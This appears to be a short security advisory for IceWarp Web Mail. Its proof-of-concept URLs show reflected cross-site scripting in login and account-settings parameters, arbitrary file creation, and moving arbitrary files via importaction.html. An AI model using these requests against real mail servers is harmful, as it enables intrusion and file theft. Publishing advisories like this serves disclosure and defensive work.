• info
• discussion
• exploit
• solution
• references

IceWarp Web Mail Multiple Remote Vulnerabilities

No exploits are required to leverage these issues. The following proof of concepts have been provided:

To carry out cross-site scripting attacks:
http://www.example.com:32000/mail/login.html?username=[xss_here]
http://www.example.com/mail/accountsettings_add.html?id=[]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[xss_here]

To create a file with arbitrary contents on an affected computer:
http://www.example.com:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accontid=[arbitary_text]

To move an arbitrary file to an attacker's folder:
http://localhost:32000/importaction.html?id=[sessionid]&importfile=[arbitrary_path]&action=upload&Import=1&importfile_size=1000000